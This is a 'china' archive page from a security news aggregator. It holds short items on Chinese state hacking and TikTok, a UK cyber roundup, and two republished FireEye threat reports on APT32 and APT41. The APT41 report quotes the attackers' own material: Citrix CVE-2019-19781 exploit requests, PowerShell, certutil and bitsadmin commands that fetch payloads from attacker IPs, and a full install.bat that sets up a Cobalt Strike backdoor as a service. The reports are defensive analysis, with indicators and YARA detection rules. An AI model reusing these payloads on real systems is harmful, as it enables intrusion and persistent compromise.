Category Archives: china

Bug Parade: NSA Warns on Cresting China-Backed Cyberattacks

The Feds have published a Top 25 exploits list, rife with big names like BlueKeep, Zerologon and other notorious security vulnerabilities.

NSA Advisory on Chinese Government Hacking

The NSA released an advisory listing the top twenty-five known vulnerabilities currently being exploited by Chinese nation-state attackers.

This advisory provides Common Vulnerabilities and Exposures (CVEs) known to be recently leveraged, or scanned-for, by Chinese state-sponsored cyber actors to enable successful hacking operations against a multitude of victim networks. Most of the vulnerabilities listed below can be exploited to gain initial access to victim networks using products that are directly accessible from the Internet and act as gateways to internal networks. The majority of the products are either for remote access (T1133) or for external web services (T1190), and should be prioritized for immediate patching.

25 vulnerabilities exploited by Chinese state-sponsored hackers

The US Cybersecurity and Infrastructure Security Agency (CISA) has released a list of 25 vulnerabilities Chinese state-sponsored hackers have been recently scanning for or have exploited in attacks. “Most of the vulnerabilities […] can be exploited to gain initial access to victim networks using products that are directly accessible from the Internet and act as gateways to internal networks. The majority of the products are either for remote access or for external web services, and … More

The post 25 vulnerabilities exploited by Chinese state-sponsored hackers appeared first on Help Net Security.

Your data is not destined for China, assures TikTok’s UK boss

The controversial app’s users are ignoring geopolitical battle over its digital security, says Richard Waterworth

TikTok’s UK chief has strenuously denied the video-sharing app, which Donald Trump has threatened to ban, shares data with China.

Richard Waterworth told the Observer that the UK and European arm of TikTok was growing quickly, despite the “turbulent” geopolitical battle in which the Chinese-born app has found itself.

Continue reading...

Cyber Security Roundup for July 2020

A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, June 2020.

Australian Prime Minister Scott Morrison announced a sophisticated nation-state actor is causing increasing havoc by attacking the country’s government, corporate institutions, and his country's critical infrastructure operators. He said, “We know it is a sophisticated state-based cyber actor because of the scale and nature of the targeting and the tradecraft used". While Morrison didn't actually name the specific country responsible in his statement, Reuters said its sources confirmed China was the culprit.  Political t
ensions have ramped up between Australia and China in recent months after Australia called for an investigation into China’s handling of the COVID-19 pandemic. China then reacted by placing tariffs on Australian exports and banning shipments of beef from Australia.

Why am I leading a UK cybersecurity blog with an Australian cyberattacks story? Well, it is because the UK might well be next in the cross-hairs of China's sophisticated cyber army, after the UK Governance stance on using Huawei in 5G infrastructure significantly soured last month. And also due to the increasing political pressure applied by the UK government on the Chinese government following their introduction of a controversial new security law in Hong Kong.

Increased UK Huawei Tensions in June 2020
While the Australian PM righty suggested their nation-state threat actor was sophisticated, the cyberattacks they described aren't so sophisticated. Their attackers engaged in spear-phishing campaigns designed to trick email recipients into clicking a link leading to a malicious files or credential harvesting page, opening malicious attachments or granting Office 365 OAuth tokens to the actors.  This is the same MO of cyber attacks orchestrated by the cybercriminals fraternity on a daily basis. The Australian government statement advises organisations to patch their internet-facing devices, including web and email servers and to use multifactor authentication. All good advise, in fact, all essential good practice for all organisations to adopt no matter their threat actor landscape.

Away from the international cyber warfare scene, a coalition led by security companies is urging the UK government to revamp the much-dated Computer Misuse Act. The UK's 'anti-hacking' law is 30 years old, so written well before the internet took root in our digital society, so is not really suitable for prosecuting for modern cybercriminals, they tend to be prosecuted under financial crime and fraud laws. The coalition is calling for a change in the law includes the NCC Group, F-Secure, techUK, McAfee and Trend Micro. They argue section 1 of the Act prohibits the unauthorised access to any programme or data held in any computer and has not kept pace with advances in technology. In their letter to PM they said "With the advent of modern threat intelligence research, defensive cyber activities often involve the scanning and interrogation of compromised victims and criminals systems to lessen the impact of attacks and prevent future incidents. In these cases, criminals are obviously very unlikely to explicitly authorise such access."

Since launching a 'Suspicious Email Reporting Service' in April 2020, the UK National Cyber Security Centre (NCSC) announced it has now received one million reports, receiving around 16,500 emails a day. NCSC Chief Executive Officer Ciaran Martin called the number of reports a “milestone” and “a testament to the vigilance of the British public". I think the email reporting service is another fantastic free service provided by NCSC (i.e. UK Gov) to UK citizens, so one thing the UK government is definitely getting right in the cybersecurity space at the moment.

Zoom announced it will extend 'optional' end-to-end encryption (E2EE) to free users. It is not certain when exactly Zoom's free E2EE will commence or whether it will be defaulted as on, given the Zoom CEO said, “We plan to begin early beta of the E2EE feature in July 2020.” Still good to see the much security criticised Zoom is continuing to bolstering its security, and also by appointing a seasoned Chief Information Security Officer from Salesforce.

Some men just want to watch the world burn...
With the recent uptick in ransomware, phishing, unsecured cloud buckets and massive data breaches dominating the media headlines over the past couple of years, you could be forgiven for forgetting about the threat posed by Distributed-Denial-of-Service (DDoS) attacks. So then, a timely reminder that some threat actors have vast botnets as their disposal for orchestrating huge DDoS attacks after Amazon reported thwarting the biggest ever DDoS attack, and a European bank suffered the biggest ever PPS DDoS attack. The motives of these colossal DDoS attacks are unclear, I guess some men just want to watch the world burn.
Quote from Batman butler Alfred (Michael Caine), The Dark Knight
BLOG
NEWS
VULNERABILITIES AND SECURITY UPDATES
AWARENESS, EDUCATION AND THREAT INTELLIGENCE

    Vietnamese Threat Actors APT32 Targeting Wuhan Government and Chinese Ministry of Emergency Management in Latest Example of COVID-19 Related Espionage

    From at least January to April 2020, suspected Vietnamese actors APT32 carried out intrusion campaigns against Chinese targets that Mandiant Threat Intelligence believes was designed to collect intelligence on the COVID-19 crisis. Spear phishing messages were sent by the actor to China's Ministry of Emergency Management as well as the government of Wuhan province, where COVID-19 was first identified. While targeting of East Asia is consistent with the activity we’ve previously reported on APT32, this incident, and other publicly reported intrusions, are part of a global increase in cyber espionage related to the crisis, carried out by states desperately seeking solutions and nonpublic information.

    Phishing Emails with Tracking Links Target Chinese Government

    The first known instance of this campaign was on Jan. 6, 2020, when APT32 sent an email with an embedded tracking link (Figure 1) to China's Ministry of Emergency Management using the sender address lijianxiang1870@163[.]com and the subject 第一期办公设备招标结果报告 (translation: Report on the first quarter results of office equipment bids). The embedded link contained the victim's email address and code to report back to the actors if the email was opened.


    Figure 1: Phishing email to China's Ministry of Emergency Management

    Mandiant Threat Intelligence uncovered additional tracking URLs that revealed targets in China's Wuhan government and an email account also associated with the Ministry of Emergency Management.

    • libjs.inquirerjs[.]com/script/<VICTIM>@wuhan.gov.cn.png
    • libjs.inquirerjs[.]com/script/<VICTIM>@chinasafety.gov.cn.png
    • m.topiccore[.]com/script/<VICTIM>@chinasafety.gov.cn.png
    • m.topiccore[.]com/script/<VICTIM>@wuhan.gov.cn.png
    • libjs.inquirerjs[.]com/script/<VICTIM>@126.com.png

    The libjs.inquirerjs[.]com domain was used in December as a command and control domain for a METALJACK phishing campaign likely targeting Southeast Asian countries.

    Additional METALJACK Activity Suggests Campaigns Targeting Mandarin Speakers Interested in COVID-19

    APT32 likely used COVID-19-themed malicious attachments against Chinese speaking targets. While we have not uncovered the full execution chain, we uncovered a METALJACK loader displaying a Chinese-Language titled COVID-19 decoy document while launching its payload.

    When the METALJACK loader, krpt.dll (MD5: d739f10933c11bd6bd9677f91893986c) is loaded, the export "_force_link_krpt" is likely called. The loader executes one of its embedded resources, a COVID-themed RTF file, displaying the content to the victim and saving the document to %TEMP%.

    The decoy document (Figure 2) titled 冠状病毒实时更新:中国正在追踪来自湖北的旅行者, MD5: c5b98b77810c5619d20b71791b820529 (Translation: COVID-19 live updates: China is currently tracking all travelers coming from Hubei Province) displays a copy of a New York Times article to the victim.


    Figure 2: COVID-themed decoy document

    The malware also loads shellcode in an additional resource, MD5: a4808a329b071a1a37b8d03b1305b0cb, which contains the METALJACK payload. The shellcode performs a system survey to collect the victim's computer name and username and then appends those values to a URL string using libjs.inquirerjs[.]com. It then attempts to call out to the URL. If the callout is successful, the malware loads the METALJACK payload into memory.

    It then uses vitlescaux[.]com for command and control.

    Outlook

    The COVID-19 crisis poses an intense, existential concern to governments, and the current air of distrust is amplifying uncertainties, encouraging intelligence collection on a scale that rivals armed conflict. National, state or provincial, and local governments, as well as non-government organizations and international organizations, are being targeted, as seen in reports. Medical research has been targeted as well, according to public statements by a Deputy Assistant Director of the FBI. Until this crisis ends, we anticipate related cyber espionage will continue to intensify globally.

    Indicators

    Type

    Indicators

    Domains

    m.topiccore[.]com

    jcdn.jsoid[.]com

    libjs.inquirerjs[.]com

    vitlescaux[.]com

    Email Address

    lijianxiang1870@163[.]com

    Files

    MD5: d739f10933c11bd6bd9677f91893986c

    METALJACK loader

    MD5: a4808a329b071a1a37b8d03b1305b0cb

    METALJACK Payload

    MD5: c5b98b77810c5619d20b71791b820529

    Decoy Document (Not Malicious)

    Detecting the Techniques

    Platform

    Signature Name

    Endpoint Security

    Generic.mg.d739f10933c11bd6

    Network Security

    Trojan.Apost.FEC2, Trojan.Apost.FEC3, fe_ml_heuristic

    Email Security

    Trojan.Apost.FEC2, Trojan.Apost.FEC3, fe_ml_heuristic

    Helix

     

    Mandiant Security Validation Actions

    • A150-096 - Malicious File Transfer - APT32, METALJACK, Download
    • A150-119 - Protected Theater - APT32, METALJACK Execution
    • A150-104 - Phishing Email - Malicious Attachment, APT32, Contact Information Lure

    MITRE ATT&CK Technique Mapping

    Tactic

    Techniques

    Initial Access

    Spearphishing Attachment (T1193), Spearphising Link (T1192)

    Execution

    Regsvr32 (T1117), User Execution (T1204)

    Defense Evasion

    Regsvr32 (T1117)

    Command and Control

    Standard Cryptographic Protocol (T1032), Custom Command and Control Protocol (T1094)

    This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits

    Beginning this year, FireEye observed Chinese actor APT41 carry out one of the broadest campaigns by a Chinese cyber espionage actor we have observed in recent years. Between January 20 and March 11, FireEye observed APT41 attempt to exploit vulnerabilities in Citrix NetScaler/ADC, Cisco routers, and Zoho ManageEngine Desktop Central at over 75 FireEye customers. Countries we’ve seen targeted include Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, UAE, UK and USA. The following industries were targeted: Banking/Finance, Construction, Defense Industrial Base, Government, Healthcare, High Technology, Higher Education, Legal, Manufacturing, Media, Non-profit, Oil & Gas, Petrochemical, Pharmaceutical, Real Estate, Telecommunications, Transportation, Travel, and Utility. It’s unclear if APT41 scanned the Internet and attempted exploitation en masse or selected a subset of specific organizations to target, but the victims appear to be more targeted in nature.

    Exploitation of CVE-2019-19781 (Citrix Application Delivery Controller [ADC])

    Starting on January 20, 2020, APT41 used the IP address 66.42.98[.]220 to attempt exploits of Citrix Application Delivery Controller (ADC) and Citrix Gateway devices with CVE-2019-19781 (published December 17, 2019).


    Figure 1: Timeline of key events

    The initial CVE-2019-19781 exploitation activity on January 20 and January 21, 2020, involved execution of the command ‘file /bin/pwd’, which may have achieved two objectives for APT41. First, it would confirm whether the system was vulnerable and the mitigation wasn’t applied. Second, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step.  

    One interesting thing to note is that all observed requests were only performed against Citrix devices, suggesting APT41 was operating with an already-known list of identified devices accessible on the internet.

    POST /vpns/portal/scripts/newbm.pl HTTP/1.1
    Host: [redacted]
    Connection: close
    Accept-Encoding: gzip, deflate
    Accept: */*
    User-Agent: python-requests/2.22.0
    NSC_NONCE: nsroot
    NSC_USER: ../../../netscaler/portal/templates/[redacted]
    Content-Length: 96

    url=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `file /bin/pwd`') %]

    Figure 2: Example APT41 HTTP traffic exploiting CVE-2019-19781

    There is a lull in APT41 activity between January 23 and February 1, which is likely related to the Chinese Lunar New Year holidays which occurred between January 24 and January 30, 2020. This has been a common activity pattern by Chinese APT groups in past years as well.

    Starting on February 1, 2020, APT41 moved to using CVE-2019-19781 exploit payloads that initiate a download via the File Transfer Protocol (FTP). Specifically, APT41 executed the command ‘/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd’, which connected to 66.42.98[.]220 over the FTP protocol, logged in to the FTP server with a username of ‘test’ and a password that we have redacted, and then downloaded an unknown payload named ‘bsd’ (which was likely a backdoor).

    POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
    Accept-Encoding: identity
    Content-Length: 147
    Connection: close
    Nsc_User: ../../../netscaler/portal/templates/[redacted]
    User-Agent: Python-urllib/2.7
    Nsc_Nonce: nsroot
    Host: [redacted]
    Content-Type: application/x-www-form-urlencoded

    url=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd`') %]

    Figure 3: Example APT41 HTTP traffic exploiting CVE-2019-19781

    We did not observe APT41 activity at FireEye customers between February 2 and February 19, 2020. China initiated COVID-19 related quarantines in cities in Hubei province starting on January 23 and January 24, and rolled out quarantines to additional provinces starting between February 2 and February 10. While it is possible that this reduction in activity might be related to the COVID-19 quarantine measures in China, APT41 may have remained active in other ways, which we were unable to observe with FireEye telemetry. We observed a significant uptick in CVE-2019-19781 exploitation on February 24 and February 25. The exploit behavior was almost identical to the activity on February 1, where only the name of the payload ‘un’ changed.

    POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
    Accept-Encoding: identity
    Content-Length: 145
    Connection: close
    Nsc_User: ../../../netscaler/portal/templates/[redacted]
    User-Agent: Python-urllib/2.7
    Nsc_Nonce: nsroot
    Host: [redacted]
    Content-Type: application/x-www-form-urlencoded

    url=http://example.com&title= [redacted]&desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/un`') %]

    Figure 4: Example APT41 HTTP traffic exploiting CVE-2019-19781

    Citrix released a mitigation for CVE-2019-19781 on December 17, 2019, and as of January 24, 2020, released permanent fixes for all supported versions of Citrix ADC, Gateway, and SD-WAN WANOP.

    Cisco Router Exploitation

    On February 21, 2020, APT41 successfully exploited a Cisco RV320 router at a telecommunications organization and downloaded a 32-bit ELF binary payload compiled for a 64-bit MIPS processor named ‘fuc’ (MD5: 155e98e5ca8d662fad7dc84187340cbc). It is unknown what specific exploit was used, but there is a Metasploit module that combines two CVE’s (CVE-2019-1653 and CVE-2019-1652) to enable remote code execution on Cisco RV320 and RV325 small business routers and uses wget to download the specified payload.

    GET /test/fuc
    HTTP/1.1
    Host: 66.42.98\.220
    User-Agent: Wget
    Connection: close

    Figure 5: Example HTTP request showing Cisco RV320 router downloading a payload via wget

    66.42.98[.]220 also hosted a file name http://66.42.98[.]220/test/1.txt. The content of 1.txt (MD5:  c0c467c8e9b2046d7053642cc9bdd57d) is ‘cat /etc/flash/etc/nk_sysconfig’, which is the command one would execute on a Cisco RV320 router to display the current configuration.

    Cisco PSIRT confirmed that fixed software to address the noted vulnerabilities is available and asks customers to review the following security advisories and take appropriate action:

    Exploitation of CVE-2020-10189 (Zoho ManageEngine Zero-Day Vulnerability)

    On March 5, 2020, researcher Steven Seeley, published an advisory and released proof-of-concept code for a zero-day remote code execution vulnerability in Zoho ManageEngine Desktop Central versions prior to 10.0.474 (CVE-2020-10189). Beginning on March 8, FireEye observed APT41 use 91.208.184[.]78 to attempt to exploit the Zoho ManageEngine vulnerability at more than a dozen FireEye customers, which resulted in the compromise of at least five separate customers. FireEye observed two separate variations of how the payloads (install.bat and storesyncsvc.dll) were deployed. In the first variation the CVE-2020-10189 exploit was used to directly upload “logger.zip”, a simple Java based program, which contained a set of commands to use PowerShell to download and execute install.bat and storesyncsvc.dll.

    java/lang/Runtime

    getRuntime

    ()Ljava/lang/Runtime;

    Xcmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/install.bat','C:\
    Windows\Temp\install.bat')&powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/storesyncsvc.dll','
    C:\Windows\Temp\storesyncsvc.dll')&C:\Windows\Temp\install.bat

    '(Ljava/lang/String;)Ljava/lang/Process;

    StackMapTable

    ysoserial/Pwner76328858520609

    Lysoserial/Pwner76328858520609;

    Figure 6: Contents of logger.zip

    Here we see a toolmark from the tool ysoserial that was used to create the payload in the POC. The string Pwner76328858520609 is unique to the POC payload, indicating that APT41 likely used the POC as source material in their operation.

    In the second variation, FireEye observed APT41 leverage the Microsoft BITSAdmin command-line tool to download install.bat (MD5: 7966c2c546b71e800397a67f942858d0) from known APT41 infrastructure 66.42.98[.]220 on port 12345.

    Parent Process: C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe

    Process Arguments: cmd /c bitsadmin /transfer bbbb http://66.42.98[.]220:12345/test/install.bat C:\Users\Public\install.bat

    Figure 7: Example FireEye Endpoint Security event depicting successful CVE-2020-10189 exploitation

    In both variations, the install.bat batch file was used to install persistence for a trial-version of Cobalt Strike BEACON loader named storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f).

    @echo off

    set "WORK_DIR=C:\Windows\System32"

    set "DLL_NAME=storesyncsvc.dll"

    set "SERVICE_NAME=StorSyncSvc"

    set "DISPLAY_NAME=Storage Sync Service"

    set "DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync relationships with multiple storage accounts via multiple sync groups. If this service is stopped or disabled, applications will be unable to run collectly."

     sc stop %SERVICE_NAME%

    sc delete %SERVICE_NAME%

    mkdir %WORK_DIR%

    copy "%~dp0%DLL_NAME%" "%WORK_DIR%" /Y

    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v "%SERVICE_NAME%" /t REG_MULTI_SZ /d "%SERVICE_NAME%" /f

    sc create "%SERVICE_NAME%" binPath= "%SystemRoot%\system32\svchost.exe -k %SERVICE_NAME%" type= share start= auto error= ignore DisplayName= "%DISPLAY_NAME%"

    SC failure "%SERVICE_NAME%" reset= 86400 actions= restart/60000/restart/60000/restart/60000

    sc description "%SERVICE_NAME%" "%DESCRIPTION%"

    reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /f

    reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /v "ServiceDll" /t REG_EXPAND_SZ /d "%WORK_DIR%\%DLL_NAME%" /f

    net start "%SERVICE_NAME%"

    Figure 8: Contents of install.bat

    Storesyncsvc.dll was a Cobalt Strike BEACON implant (trial-version) which connected to exchange.dumb1[.]com (with a DNS resolution of 74.82.201[.]8) using a jquery malleable command and control (C2) profile.

    GET /jquery-3.3.1.min.js HTTP/1.1
    Host: cdn.bootcss.com
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Referer: http://cdn.bootcss.com/
    Accept-Encoding: gzip, deflate
    Cookie: __cfduid=CdkIb8kXFOR_9Mn48DQwhIEuIEgn2VGDa_XZK_xAN47OjPNRMpJawYvnAhPJYM
    DA8y_rXEJQGZ6Xlkp_wCoqnImD-bj4DqdTNbj87Rl1kIvZbefE3nmNunlyMJZTrDZfu4EV6oxB8yKMJfLXydC5YF9OeZwqBSs3Tun12BVFWLI
    User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
    Connection: Keep-Alive Cache-Control: no-cache

    Figure 9: Example APT41 Cobalt Strike BEACON jquery malleable C2 profile HTTP request

    Within a few hours of initial exploitation, APT41 used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor with a different C2 address that uses Microsoft CertUtil, a common TTP that we’ve observed APT41 use in past intrusions, which they then used to download 2.exe (MD5: 3e856162c36b532925c8226b4ed3481c). The file 2.exe was a VMProtected Meterpreter downloader used to download Cobalt Strike BEACON shellcode. The usage of VMProtected binaries is another very common TTP that we’ve observed this group leverage in multiple intrusions in order to delay analysis of other tools in their toolkit.

    GET /2.exe HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/6.3
    Host: 91.208.184[.]78

    Figure 10: Example HTTP request downloading ‘2.exe’ VMProtected Meterpreter downloader via CertUtil

    certutil  -urlcache -split -f http://91.208.184[.]78/2.exe

    Figure 11: Example CertUtil command to download ‘2.exe’ VMProtected Meterpreter downloader

    The Meterpreter downloader ‘TzGG’ was configured to communicate with 91.208.184[.]78 over port 443 to download the shellcode (MD5: 659bd19b562059f3f0cc978e15624fd9) for Cobalt Strike BEACON (trial-version).

    GET /TzGG HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
    Host: 91.208.184[.]78:443
    Connection: Keep-Alive
    Cache-Control: no-cache

    Figure 12: Example HTTP request downloading ‘TzGG’ shellcode for Cobalt Strike BEACON

    The downloaded BEACON shellcode connected to the same C2 server: 91.208.184[.]78. We believe this is an example of the actor attempting to diversify post-exploitation access to the compromised systems.

    ManageEngine released a short term mitigation for CVE-2020-10189 on January 20, 2020, and subsequently released an update on March 7, 2020, with a long term fix.

    Outlook

    This activity is one of the most widespread campaigns we have seen from China-nexus espionage actors in recent years. While APT41 has previously conducted activity with an extensive initial entry such as the trojanizing of NetSarang software, this scanning and exploitation has focused on a subset of our customers, and seems to reveal a high operational tempo and wide collection requirements for APT41.

    It is notable that we have only seen these exploitation attempts leverage publicly available malware such as Cobalt Strike and Meterpreter. While these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance. In 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks. This new activity from this group shows how resourceful and how quickly they can leverage newly disclosed vulnerabilities to their advantage.

    Previously, FireEye Mandiant Managed Defense identified APT41 successfully leverage CVE-2019-3396 (Atlassian Confluence) against a U.S. based university. While APT41 is a unique state-sponsored Chinese threat group that conducts espionage, the actor also conducts financially motivated activity for personal gain.

    Indicators

    Type

    Indicator(s)

    CVE-2019-19781 Exploitation (Citrix Application Delivery Control)

    66.42.98[.]220

    CVE-2019-19781 exploitation attempts with a payload of ‘file /bin/pwd’

    CVE-2019-19781 exploitation attempts with a payload of ‘/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/bsd’

    CVE-2019-19781 exploitation attempts with a payload of ‘/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/un’

    /tmp/bsd

    /tmp/un

    Cisco Router Exploitation

    66.42.98\.220

    ‘1.txt’ (MD5:  c0c467c8e9b2046d7053642cc9bdd57d)

    ‘fuc’ (MD5: 155e98e5ca8d662fad7dc84187340cbc

    CVE-2020-10189 (Zoho ManageEngine Desktop Central)

    66.42.98[.]220

    91.208.184[.]78

    74.82.201[.]8

    exchange.dumb1[.]com

    install.bat (MD5: 7966c2c546b71e800397a67f942858d0)

    storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f)

    C:\Windows\Temp\storesyncsvc.dll

    C:\Windows\Temp\install.bat

    2.exe (MD5: 3e856162c36b532925c8226b4ed3481c)

    C:\Users\[redacted]\install.bat

    TzGG (MD5: 659bd19b562059f3f0cc978e15624fd9)

    C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe spawning cmd.exe and/or bitsadmin.exe

    Certutil.exe downloading 2.exe and/or payloads from 91.208.184[.]78

    PowerShell downloading files with Net.WebClient

    Detecting the Techniques

    FireEye detects this activity across our platforms. This table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.

    Platform

    Signature Name

    Endpoint Security

     

    BITSADMIN.EXE MULTISTAGE DOWNLOADER (METHODOLOGY)

    CERTUTIL.EXE DOWNLOADER A (UTILITY)

    Generic.mg.5909983db4d9023e

    Generic.mg.3e856162c36b5329

    POWERSHELL DOWNLOADER (METHODOLOGY)

    SUSPICIOUS BITSADMIN USAGE B (METHODOLOGY)

    SAMWELL (BACKDOOR)

    SUSPICIOUS CODE EXECUTION FROM ZOHO MANAGE ENGINE (EXPLOIT)

    Network Security

    Backdoor.Meterpreter

    DTI.Callback

    Exploit.CitrixNetScaler

    Trojan.METASTAGE

    Exploit.ZohoManageEngine.CVE-2020-10198.Pwner

    Exploit.ZohoManageEngine.CVE-2020-10198.mdmLogUploader

    Helix

    CITRIX ADC [Suspicious Commands]
     EXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Attempt]
     EXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Success]
     EXPLOIT - CITRIX ADC [CVE-2019-19781 Payload Access]
     EXPLOIT - CITRIX ADC [CVE-2019-19781 Scanning]
     MALWARE METHODOLOGY [Certutil User-Agent]
     WINDOWS METHODOLOGY [BITSadmin Transfer]
     WINDOWS METHODOLOGY [Certutil Downloader]

    MITRE ATT&CK Technique Mapping

    ATT&CK

    Techniques

    Initial Access

    External Remote Services (T1133), Exploit Public-Facing Application (T1190)

    Execution

    PowerShell (T1086), Scripting (T1064)

    Persistence

    New Service (T1050)

     

    Privilege Escalation

    Exploitation for Privilege Escalation (T1068)

     

    Defense Evasion

    BITS Jobs (T1197), Process Injection (T1055)

     

     

    Command And Control

    Remote File Copy (T1105), Commonly Used Port (T1436), Uncommonly Used Port (T1065), Custom Command and Control Protocol (T1094), Data Encoding (T1132), Standard Application Layer Protocol (T1071)

    Appendix A: Discovery Rules

    The following Yara rules serve as examples of discovery rules for APT41 actor TTPs, turning the adversary methods or tradecraft into new haystacks for purposes of detection or hunting. For all tradecraft-based discovery rules, we recommend deliberate testing and tuning prior to implementation in any production system. Some of these rules are tailored to build concise haystacks that are easy to review for high-fidelity detections. Some of these rules are broad in aperture that build larger haystacks for further automation or processing in threat hunting systems.

    import "pe"

    rule ExportEngine_APT41_Loader_String

    {

                meta:

                            author = "@stvemillertime"

                            description "This looks for a common APT41 Export DLL name in BEACON shellcode loaders, such as loader_X86_svchost.dll"

                strings:

                            $pcre = /loader_[\x00-\x7F]{1,}\x00/

                condition:

                            uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))

    }

    rule ExportEngine_ShortName

    {

        meta:

            author = "@stvemillertime"

            description = "This looks for Win PEs where Export DLL name is a single character"

        strings:

            $pcre = /[A-Za-z0-9]{1}\.(dll|exe|dat|bin|sys)/

        condition:

            uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))

    }

    rule ExportEngine_xArch

    {

        meta:

            author = "@stvemillertime"

            description = "This looks for Win PEs where Export DLL name is a something like x32.dat"

                strings:

                 $pcre = /[\x00-\x7F]{1,}x(32|64|86)\.dat\x00/

                condition:

                 uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))

    }

    rule RareEquities_LibTomCrypt

    {

        meta:

            author = "@stvemillertime"

            description = "This looks for executables with strings from LibTomCrypt as seen by some APT41-esque actors https://github.com/libtom/libtomcrypt - might catch everything BEACON as well. You may want to exclude Golang and UPX packed samples."

        strings:

            $a1 = "LibTomMath"

        condition:

            uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $a1

    }

    rule RareEquities_KCP

    {

        meta:

            author = "@stvemillertime"

            description = "This is a wide catchall rule looking for executables with equities for a transport library called KCP, https://github.com/skywind3000/kcp Matches on this rule may have built-in KCP transport ability."

        strings:

            $a01 = "[RO] %ld bytes"

            $a02 = "recv sn=%lu"

            $a03 = "[RI] %d bytes"

            $a04 = "input ack: sn=%lu rtt=%ld rto=%ld"

            $a05 = "input psh: sn=%lu ts=%lu"

            $a06 = "input probe"

            $a07 = "input wins: %lu"

            $a08 = "rcv_nxt=%lu\\n"

            $a09 = "snd(buf=%d, queue=%d)\\n"

            $a10 = "rcv(buf=%d, queue=%d)\\n"

            $a11 = "rcvbuf"

        condition:

            (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 5MB and 3 of ($a*)

    }

    rule ConventionEngine_Term_Users

    {

                meta:

                            author = "@stvemillertime"

                            description = "Searching for PE files with PDB path keywords, terms or anomalies."

                            sample_md5 = "09e4e6fa85b802c46bc121fcaecc5666"

                            ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"

                strings:

                            $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}Users[\x00-\xFF]{0,200}\.pdb\x00/ nocase ascii

                condition:

                            (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre

    }

    rule ConventionEngine_Term_Desktop

    {

                meta:

                            author = "@stvemillertime"

                            description = "Searching for PE files with PDB path keywords, terms or anomalies."

                            sample_md5 = "71cdba3859ca8bd03c1e996a790c04f9"

                            ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"

                strings:

                            $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}Desktop[\x00-\xFF]{0,200}\.pdb\x00/ nocase ascii

                condition:

                            (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre

    }

    rule ConventionEngine_Anomaly_MultiPDB_Double

    {

                meta:

                            author = "@stvemillertime"

                            description = "Searching for PE files with PDB path keywords, terms or anomalies."

                            sample_md5 = "013f3bde3f1022b6cf3f2e541d19353c"

                            ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"

                strings:

                            $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}\.pdb\x00/

                condition:

                            (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and #pcre == 2

    }

